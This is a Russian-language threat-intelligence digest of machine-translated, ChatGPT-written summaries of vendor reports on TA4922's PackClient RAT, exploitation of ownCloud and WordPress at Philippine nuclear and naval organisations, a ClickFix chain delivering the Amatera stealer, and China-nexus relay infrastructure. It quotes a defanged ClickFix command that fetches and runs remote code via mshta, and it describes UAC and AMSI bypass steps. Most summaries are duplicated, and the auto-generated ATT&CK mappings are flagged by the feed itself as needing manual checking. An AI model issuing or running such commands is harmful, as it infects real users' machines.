Proofpoint зафиксировала деятельность китайскоязычного злоумышленника, отслеживаемого под идентификатором TA4922, который использовал модульный RAT PackClient в ходе атаки с использованием налоговой тематики против рабочей станции Windows, подключенной к домену Active Directory. Жертва запустила файл `Tax_Notice_10029.exe` с образа диска `ITR_DOCUMENT`, что соответствует кампаниям, в рамках которых вредоносные исполняемые файлы доставляются через файлы IMG и приманки, связанные с налогами. Вредоносное ПО создало запланированную задачу `NvSvc`, настроенную на запуск при входе в систему с наивысшими привилегиями из пути, маскирующегося под службу NVIDIA. Затем оно выполнило полостное внедрение (process hollowing) в 32-битный экземпляр `svchost.exe`, запущенный без аргументов, который поддерживал собственный TCP-канал C2 с адресом `192.252.180.45:6666` примерно каждые две минуты, в том числе после перезагрузки системы.
Примерно через четыре с половиной часа оператор начал выполнять действия с использованием клавиатуры и мыши (hands-on-keyboard) через RAT. Скрипт на VBScript отключал запросы UAC, многократно устанавливая значение параметра `ConsentPromptBehaviorAdmin` в `0`, а затем использовал переименованный, подписанный Microsoft файл `curl.exe` (`sys31.dll`) с отключенной проверкой сертификатов для загрузки пакета с домена `opkjhblll.cc`. Дополнительные скрипты в фоновом режиме установили агент ManageEngine Endpoint Central/UEMS с помощью `msiexec`, созданного атакующим преобразования (transform) и управляемых атакующим корневых сертификатов. Агент зарегистрировался на сервере Endpoint Central по адресу `192.229.87.219` через порты `8383` и `8027`, используя имя хоста `WIN-N3U83AJBEEH`.
После установки злоумышленник использовал легитимные компоненты UEMS, подписанные Zoho, для инвентаризации хостов, обнаружения программного и аппаратного обеспечения, перечисления пользователей и групп Active Directory через SAMR/LSAD, сканирования на наличие патчей и ошибок конфигурации, а также для интерактивного удаленного управления. После перезагрузки сервер развернул DeviceControl — драйвер файлового фильтра ядра, функциональность управления BitLocker, а также компоненты EDR для защиты от программ-вымогателей от ManageEngine. Эти действия обеспечивали широкие возможности управления и контроля, одновременно маскируясь под легитимную деятельность по управлению конечными точками.
Ключевые возможности для обнаружения включают внедрение в пустой процесс и beaconing PackClient, запланированную задачу `NvSvc`, изменение реестра UAC из хостов скриптов, переименованные бинарные файлы `curl.exe`, установку UEMS из каталогов, доступных для записи пользователем, неожиданные адреса серверов UEMS, корневые сертификаты, установленные злоумышленником, а также исходящие соединения на порты 6666, 8383 и 8027.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
TA4922 использовал RAT PackClient в атаке с тематикой налогообложения, обеспечив закрепление (persistence) посредством замаскированной запланированной задачи и внедрения в пустой процесс (Process Hollowing). Актор отключил UAC, загрузил инструменты и установил компоненты ManageEngine Endpoint Central/UEMS для проведения обнаружения хостов, перечисления объектов Active Directory, сканирования и удаленного управления, маскируясь под легитимную административную активность.
-----
Proofpoint зафиксировала деятельность китайскоязычного злоумышленника, отслеживаемого под идентификатором TA4922, который использовал модульный RAT PackClient в ходе атаки с использованием налоговой тематики против рабочей станции Windows, подключенной к домену Active Directory. Жертва запустила файл `Tax_Notice_10029.exe` с образа диска `ITR_DOCUMENT`, что соответствует кампаниям, в рамках которых вредоносные исполняемые файлы доставляются через файлы IMG и приманки, связанные с налогами. Вредоносное ПО создало запланированную задачу `NvSvc`, настроенную на запуск при входе в систему с наивысшими привилегиями из пути, маскирующегося под службу NVIDIA. Затем оно выполнило полостное внедрение (process hollowing) в 32-битный экземпляр `svchost.exe`, запущенный без аргументов, который поддерживал собственный TCP-канал C2 с адресом `192.252.180.45:6666` примерно каждые две минуты, в том числе после перезагрузки системы.
Примерно через четыре с половиной часа оператор начал выполнять действия с использованием клавиатуры и мыши (hands-on-keyboard) через RAT. Скрипт на VBScript отключал запросы UAC, многократно устанавливая значение параметра `ConsentPromptBehaviorAdmin` в `0`, а затем использовал переименованный, подписанный Microsoft файл `curl.exe` (`sys31.dll`) с отключенной проверкой сертификатов для загрузки пакета с домена `opkjhblll.cc`. Дополнительные скрипты в фоновом режиме установили агент ManageEngine Endpoint Central/UEMS с помощью `msiexec`, созданного атакующим преобразования (transform) и управляемых атакующим корневых сертификатов. Агент зарегистрировался на сервере Endpoint Central по адресу `192.229.87.219` через порты `8383` и `8027`, используя имя хоста `WIN-N3U83AJBEEH`.
После установки злоумышленник использовал легитимные компоненты UEMS, подписанные Zoho, для инвентаризации хостов, обнаружения программного и аппаратного обеспечения, перечисления пользователей и групп Active Directory через SAMR/LSAD, сканирования на наличие патчей и ошибок конфигурации, а также для интерактивного удаленного управления. После перезагрузки сервер развернул DeviceControl — драйвер файлового фильтра ядра, функциональность управления BitLocker, а также компоненты EDR для защиты от программ-вымогателей от ManageEngine. Эти действия обеспечивали широкие возможности управления и контроля, одновременно маскируясь под легитимную деятельность по управлению конечными точками.
Ключевые возможности для обнаружения включают внедрение в пустой процесс и beaconing PackClient, запланированную задачу `NvSvc`, изменение реестра UAC из хостов скриптов, переименованные бинарные файлы `curl.exe`, установку UEMS из каталогов, доступных для записи пользователем, неожиданные адреса серверов UEMS, корневые сертификаты, установленные злоумышленником, а также исходящие соединения на порты 6666, 8383 и 8027.
#ParsedReport #CompletenessHigh
26-08-2026
Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities
https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor
Report completeness: High
Threats:
Sliver_c2_tool
Metasploit_tool
Mettle
Meterpreter_tool
Etherhiding_technique
Clickfix_technique
Victims:
Nuclear research, Marine engineering and shipbuilding, Philippine navy
Industry:
Financial, Petroleum, Critical_infrastructure, Maritime, Government
Geo:
Asia, Philippine, Philippines, Netherlands, Chinese, China
CVEs:
CVE-2024-28000 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: Unknown
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- litespeedtech litespeed_cache (<6.4)
CVE-2023-49105 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: True
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- owncloud owncloud_server (<10.13.1)
TTPs:
Tactics: 2
Technics: 11
IOCs:
IP: 3
Hash: 2
File: 24
Coin: 1
Url: 3
Soft:
WordPress, BitLocker, KeePass, SimpleHTTP, OpenSSH, Ubuntu, LiteSpeed
Crypto:
ethereum
Algorithms:
sha256, prng, pbkdf2, sha512
Functions:
mt_rand
Languages:
php, python
Platforms:
cross-platform
26-08-2026
Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities
https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor
Report completeness: High
Threats:
Sliver_c2_tool
Metasploit_tool
Mettle
Meterpreter_tool
Etherhiding_technique
Clickfix_technique
Victims:
Nuclear research, Marine engineering and shipbuilding, Philippine navy
Industry:
Financial, Petroleum, Critical_infrastructure, Maritime, Government
Geo:
Asia, Philippine, Philippines, Netherlands, Chinese, China
CVEs:
CVE-2024-28000 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: Unknown
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- litespeedtech litespeed_cache (<6.4)
CVE-2023-49105 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: True
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- owncloud owncloud_server (<10.13.1)
TTPs:
Tactics: 2
Technics: 11
IOCs:
IP: 3
Hash: 2
File: 24
Coin: 1
Url: 3
Soft:
WordPress, BitLocker, KeePass, SimpleHTTP, OpenSSH, Ubuntu, LiteSpeed
Crypto:
ethereum
Algorithms:
sha256, prng, pbkdf2, sha512
Functions:
mt_rand
Languages:
php, python
Platforms:
cross-platform
hunt.io
Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities
An exposed staging server reveals ownCloud pre-signed URL abuse against a Philippine nuclear agency and exploitation of a naval contractor's WordPress website.
CTT Report Hub
#ParsedReport #CompletenessHigh 26-08-2026 Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor Report…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Предположительно, операторы, говорящие на китайском языке, скомпрометировали организации Филиппин, связанные с государственным управлением, ядерными исследованиями и обороной, путем эксплуатации уязвимых систем ownCloud и WordPress. Они использовали собственные инструменты для обхода аутентификации, создания учетных записей администраторов, кражи конфиденциальных данных исследований, данных сотрудников, учетных данных и операционных данных, а также для подготовки к развертыванию ВПО, включая полезную нагрузку Mettle.
-----
Предположительно, операторы, говорящие на китайском языке, атаковали организации правительства Филиппин, организации в области ядерных исследований и организации, связанные с оборонным сектором, используя известные уязвимости и собственные инструменты. На открытом сервере по адресу 31.58.209.241:8000 размещались скрипты на Python, журналы передачи данных, украденные данные, инструменты для наступательной безопасности и загрузчик первого этапа в формате ELF под названием `multi_backupd` (SHA-256: `7447d0d0c34779d4c519823b39bf6ddc16d2b34a226b82ee69da6f5b4a77ad82`). Загрузчик устанавливал соединение с тем же IP-адресом на TCP-порту 8090 для получения полезной нагрузки Mettle.
Пять инструментов на Python эксплуатировали уязвимость CVE-2023-49105 в уязвимых развертываниях ownCloud. Скрипты генерировали предварительно подписанные URL, используя пустой секрет подписи PBKDF2, имитировали указанные учетные записи с помощью заголовка `OC-Credential` и получали файлы по протоколу WebDAV без аутентификации. Один из скриптов использовал запросы `PROPFIND` для перечисления каталогов и фиксировал загрузки локально. Комментарии, строки документации, сообщения журнала и каталоги вывода на упрощенном китайском языке указывали на оператора, говорящего на китайском языке.
Восстановленные каталоги промежуточного хранения содержали примерно 372 МБ данных, тогда как CSV-файл ссылался на объём украденных материалов около 9 ГБ. В собранные данные входили учётные записи, связанные с ядерными материалами, базы данных компонентов исследовательских реакторов, инвентаризация топлива, документы по радиационной безопасности, стратегические и ИТ-планы, персональные данные сотрудников (PII), записи о паспортах и поездках, а также хранилища учётных данных, содержащие материалы восстановления KeePass, AxCrypt и BitLocker. SQL-дамп системы ZKTeco BioTime объёмом 192 МБ содержал данные о сотрудниках, бейджах, отделах и журналах доступа, связанные с филиппинскими научными и исследовательскими организациями.
Филиппинская компания в области морского машиностроения и судостроения, связанная с ВМС, была скомпрометирована через её сайт на WordPress. Оператор эксплуатировал уязвимость CVE-2024-28000 в плагине LiteSpeed Cache, используя собственную реализацию на языке Go функций `mt_rand()` и MT19937 из PHP для брутфорса сидов хеша безопасности и создания учётной записи администратора. Отдельный инструмент на Python использовал интерфейс XML-RPC WordPress и словарь `rockyou.txt` для брутфорса учётной записи `admin`. Выведенные данные включали полную установку WordPress, медиафайлы, содержимое базы данных, хеши паролей, настройки плагинов и секретные ключи.
На том же сайте WordPress также присутствовало, предположительно, не связанное с ним заражение EtherHiding/ClickFix, в котором использовались размещенные в блокчейне HTML-файлы, постоянный сервис-воркер, доставка через `mshta` и VBS, а также сбор информации о жертве. Никаких доказательств, связывающих эту активность с предположительно китайскоязычным оператором, не обнаружено.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Предположительно, операторы, говорящие на китайском языке, скомпрометировали организации Филиппин, связанные с государственным управлением, ядерными исследованиями и обороной, путем эксплуатации уязвимых систем ownCloud и WordPress. Они использовали собственные инструменты для обхода аутентификации, создания учетных записей администраторов, кражи конфиденциальных данных исследований, данных сотрудников, учетных данных и операционных данных, а также для подготовки к развертыванию ВПО, включая полезную нагрузку Mettle.
-----
Предположительно, операторы, говорящие на китайском языке, атаковали организации правительства Филиппин, организации в области ядерных исследований и организации, связанные с оборонным сектором, используя известные уязвимости и собственные инструменты. На открытом сервере по адресу 31.58.209.241:8000 размещались скрипты на Python, журналы передачи данных, украденные данные, инструменты для наступательной безопасности и загрузчик первого этапа в формате ELF под названием `multi_backupd` (SHA-256: `7447d0d0c34779d4c519823b39bf6ddc16d2b34a226b82ee69da6f5b4a77ad82`). Загрузчик устанавливал соединение с тем же IP-адресом на TCP-порту 8090 для получения полезной нагрузки Mettle.
Пять инструментов на Python эксплуатировали уязвимость CVE-2023-49105 в уязвимых развертываниях ownCloud. Скрипты генерировали предварительно подписанные URL, используя пустой секрет подписи PBKDF2, имитировали указанные учетные записи с помощью заголовка `OC-Credential` и получали файлы по протоколу WebDAV без аутентификации. Один из скриптов использовал запросы `PROPFIND` для перечисления каталогов и фиксировал загрузки локально. Комментарии, строки документации, сообщения журнала и каталоги вывода на упрощенном китайском языке указывали на оператора, говорящего на китайском языке.
Восстановленные каталоги промежуточного хранения содержали примерно 372 МБ данных, тогда как CSV-файл ссылался на объём украденных материалов около 9 ГБ. В собранные данные входили учётные записи, связанные с ядерными материалами, базы данных компонентов исследовательских реакторов, инвентаризация топлива, документы по радиационной безопасности, стратегические и ИТ-планы, персональные данные сотрудников (PII), записи о паспортах и поездках, а также хранилища учётных данных, содержащие материалы восстановления KeePass, AxCrypt и BitLocker. SQL-дамп системы ZKTeco BioTime объёмом 192 МБ содержал данные о сотрудниках, бейджах, отделах и журналах доступа, связанные с филиппинскими научными и исследовательскими организациями.
Филиппинская компания в области морского машиностроения и судостроения, связанная с ВМС, была скомпрометирована через её сайт на WordPress. Оператор эксплуатировал уязвимость CVE-2024-28000 в плагине LiteSpeed Cache, используя собственную реализацию на языке Go функций `mt_rand()` и MT19937 из PHP для брутфорса сидов хеша безопасности и создания учётной записи администратора. Отдельный инструмент на Python использовал интерфейс XML-RPC WordPress и словарь `rockyou.txt` для брутфорса учётной записи `admin`. Выведенные данные включали полную установку WordPress, медиафайлы, содержимое базы данных, хеши паролей, настройки плагинов и секретные ключи.
На том же сайте WordPress также присутствовало, предположительно, не связанное с ним заражение EtherHiding/ClickFix, в котором использовались размещенные в блокчейне HTML-файлы, постоянный сервис-воркер, доставка через `mshta` и VBS, а также сбор информации о жертве. Никаких доказательств, связывающих эту активность с предположительно китайскоязычным оператором, не обнаружено.
#ParsedReport #CompletenessHigh
27-08-2026
EtherHiding in the Browser: ClickFix Chain Ends in Amatera
https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera
Report completeness: High
Threats:
Etherhiding_technique
Clickfix_technique
Amatera_stealer
Polyglot_technique
Emmenhtal
Errtraffic
Dead_drop_technique
Lolbin_technique
Acr_stealer
Acridrain
Victims:
Wordpress sites, Logged out website visitors
Industry:
Financial
TTPs:
Tactics: 2
Technics: 0
ChatGPT TTPs:
T1027, T1027.003, T1027.013, T1036.005, T1041, T1053.005, T1059.001, T1059.003, T1059.005, T1071.001, have more...
IOCs:
Url: 6
File: 18
Coin: 1
Domain: 4
Path: 2
Hash: 6
Soft:
WordPress, macOS, Chrome
Crypto:
ethereum
Algorithms:
ecdh, rc4, base64, aes-gcm, sha256, md5
Functions:
skipWaiting, getActiveScripts, getDemoPage, getScript
Languages:
vbscript, php, powershell
Platforms:
x86
Links:
27-08-2026
EtherHiding in the Browser: ClickFix Chain Ends in Amatera
https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera
Report completeness: High
Threats:
Etherhiding_technique
Clickfix_technique
Amatera_stealer
Polyglot_technique
Emmenhtal
Errtraffic
Dead_drop_technique
Lolbin_technique
Acr_stealer
Acridrain
Victims:
Wordpress sites, Logged out website visitors
Industry:
Financial
TTPs:
Tactics: 2
Technics: 0
ChatGPT TTPs:
do not use without manual checkT1027, T1027.003, T1027.013, T1036.005, T1041, T1053.005, T1059.001, T1059.003, T1059.005, T1071.001, have more...
IOCs:
Url: 6
File: 18
Coin: 1
Domain: 4
Path: 2
Hash: 6
Soft:
WordPress, macOS, Chrome
Crypto:
ethereum
Algorithms:
ecdh, rc4, base64, aes-gcm, sha256, md5
Functions:
skipWaiting, getActiveScripts, getDemoPage, getScript
Languages:
vbscript, php, powershell
Platforms:
x86
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCsNetskope
EtherHiding in the Browser: ClickFix Chain Ends in Amatera
Netskope Threat Labs has been tracking a WordPress mass-compromise campaign affecting hundreds of sites. On each one, a rogue must-use plugin registers a
CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 EtherHiding in the Browser: ClickFix Chain Ends in Amatera https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera Report completeness: High Threats: Etherhiding_technique Clickfix_technique…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания, нацеленная на WordPress, использует постоянный Service Worker для внедрения приманки ClickFix, которая побуждает пользователей Windows выполнить команду `mshta`. Это запускает цепочку Emmenhtal в памяти, основанную на PowerShell, которая в конечном итоге развертывает стиллер информации Amatera/AcridRain, выгружающий учетные данные и системные данные по TLS.
-----
Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни сайтов вредоносным must-use-плагином, который регистрирует постоянный Service Worker. Этот worker перехватывает управление страницами посетителей, удаляет защитные механизмы Content-Security-Policy и внедряет скрипт исключительно для незарегистрированных пользователей. Для обхода администраторов исключаются пути входа в WordPress и административные разделы, аутентифицированные сессии, а также управляемый оператором тестовый cookie. Поскольку Service Worker сохраняется в браузерах даже после очистки на стороне сервера, для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.
Вставленный скрипт использует ethers.js для запроса к смарт-контракту только для чтения в блокчейне Base по адресу `0x58460d0b3d4d6b03761c89120393c0c676676496`. Контракт хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA, реализуя EtherHiding с помощью механизма on-chain dead-drop. Приманка инструктирует пользователей Windows скопировать и выполнить команду `mshta http://timelevel12[.\]com/big` через диалоговое окно «Выполнить», в то время как пользователи других операционных систем получают безвредную отвлекающую информацию. Эта техника ClickFix зависит от ручного выполнения команды жертвой, что позволяет избежать стандартного сканирования вложений или загрузок.
HTA-нагрузка декодирует команду, создающую скрытую запланированную задачу с именем `serviceerg` через COM-интерфейс Schedule.Service. Задача запускает PowerShell с использованием замаскированного пути с подстановочным символом и закодированной команды. Этап PowerShell обходит Constrained Language Mode, модифицирует `amsiContext` для отключения сканирования AMSI, выполняет профилирование хоста и исполняет последующий код в памяти. Он загружает загрузчик Emmenhtal с домена `gpuh[.\]gravityzone[.\]army`, используя User-Agent, имитирующий браузер. Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на `i.ibb[.\]co`, и загружает её в память как PE-файл с помощью рефлексивной загрузки, не оставляя исполняемого файла на диске.
Финальный полезный груз — Amatera, также известный как ребрендинг ACR Stealer/AcridRain, замаскированный через метаданные под `WPA.exe`. Он крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с `gw[.\]proxyvector[.\]cc` по TLS. Разрешение DNS выполняется через провайдеры DNS-over-HTTPS, включая Google и Cloudflare, что скрывает запросы к C2 внутри зашифрованного DNS-трафика. Специалисты по защите должны отслеживать указанную инфраструктуру, активность смарт-контрактов в блокчейне, подозрительное выполнение `mshta`, скрытые запланированные задачи, вмешательство в AMSI, регистрацию Service Worker и трафик браузера к конечным точкам Base RPC.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания, нацеленная на WordPress, использует постоянный Service Worker для внедрения приманки ClickFix, которая побуждает пользователей Windows выполнить команду `mshta`. Это запускает цепочку Emmenhtal в памяти, основанную на PowerShell, которая в конечном итоге развертывает стиллер информации Amatera/AcridRain, выгружающий учетные данные и системные данные по TLS.
-----
Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни сайтов вредоносным must-use-плагином, который регистрирует постоянный Service Worker. Этот worker перехватывает управление страницами посетителей, удаляет защитные механизмы Content-Security-Policy и внедряет скрипт исключительно для незарегистрированных пользователей. Для обхода администраторов исключаются пути входа в WordPress и административные разделы, аутентифицированные сессии, а также управляемый оператором тестовый cookie. Поскольку Service Worker сохраняется в браузерах даже после очистки на стороне сервера, для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.
Вставленный скрипт использует ethers.js для запроса к смарт-контракту только для чтения в блокчейне Base по адресу `0x58460d0b3d4d6b03761c89120393c0c676676496`. Контракт хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA, реализуя EtherHiding с помощью механизма on-chain dead-drop. Приманка инструктирует пользователей Windows скопировать и выполнить команду `mshta http://timelevel12[.\]com/big` через диалоговое окно «Выполнить», в то время как пользователи других операционных систем получают безвредную отвлекающую информацию. Эта техника ClickFix зависит от ручного выполнения команды жертвой, что позволяет избежать стандартного сканирования вложений или загрузок.
HTA-нагрузка декодирует команду, создающую скрытую запланированную задачу с именем `serviceerg` через COM-интерфейс Schedule.Service. Задача запускает PowerShell с использованием замаскированного пути с подстановочным символом и закодированной команды. Этап PowerShell обходит Constrained Language Mode, модифицирует `amsiContext` для отключения сканирования AMSI, выполняет профилирование хоста и исполняет последующий код в памяти. Он загружает загрузчик Emmenhtal с домена `gpuh[.\]gravityzone[.\]army`, используя User-Agent, имитирующий браузер. Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на `i.ibb[.\]co`, и загружает её в память как PE-файл с помощью рефлексивной загрузки, не оставляя исполняемого файла на диске.
Финальный полезный груз — Amatera, также известный как ребрендинг ACR Stealer/AcridRain, замаскированный через метаданные под `WPA.exe`. Он крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с `gw[.\]proxyvector[.\]cc` по TLS. Разрешение DNS выполняется через провайдеры DNS-over-HTTPS, включая Google и Cloudflare, что скрывает запросы к C2 внутри зашифрованного DNS-трафика. Специалисты по защите должны отслеживать указанную инфраструктуру, активность смарт-контрактов в блокчейне, подозрительное выполнение `mshta`, скрытые запланированные задачи, вмешательство в AMSI, регистрацию Service Worker и трафик браузера к конечным точкам Base RPC.
#ParsedReport #CompletenessMedium
26-08-2026
Inside China-nexus cyber espionage infrastructure
https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model
Report completeness: Medium
Threats:
Fast_labyrinth_tool
Qscan_tool
Qtrouter
Qtproxy_tool
Raptor_train
Kv-botnet
Supply_chain_technique
Victims:
Research universities, Government, Defense, Public sector, Military, Healthcare, Critical infrastructure, Energy supply chains, Financial services, Enterprise software, have more...
Industry:
Military, Education, Telco, Energy, Critical_infrastructure, Healthcare, Government, Logistic, Iot, Aerospace
Geo:
Chinese, Asia-pacific, China
ChatGPT TTPs:
T1001, T1046, T1090.002, T1573, T1592.002
IOCs:
Domain: 18
IP: 5
Soft:
ORB network, RabbitMQ, Redis
Links:
26-08-2026
Inside China-nexus cyber espionage infrastructure
https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model
Report completeness: Medium
Threats:
Fast_labyrinth_tool
Qscan_tool
Qtrouter
Qtproxy_tool
Raptor_train
Kv-botnet
Supply_chain_technique
Victims:
Research universities, Government, Defense, Public sector, Military, Healthcare, Critical infrastructure, Energy supply chains, Financial services, Enterprise software, have more...
Industry:
Military, Education, Telco, Energy, Critical_infrastructure, Healthcare, Government, Logistic, Iot, Aerospace
Geo:
Chinese, Asia-pacific, China
ChatGPT TTPs:
do not use without manual checkT1001, T1046, T1090.002, T1573, T1592.002
IOCs:
Domain: 18
IP: 5
Soft:
ORB network, RabbitMQ, Redis
Links:
https://github.com/blacklotuslabs/IOCs/blob/main/Quartermaster\_IOCs.txtLumen
Inside China-nexus cyber espionage infrastructure
Black Lotus Labs and the FBI uncovered China-nexus infrastructure used to hide cyber espionage, showing how early detection helps protect customers.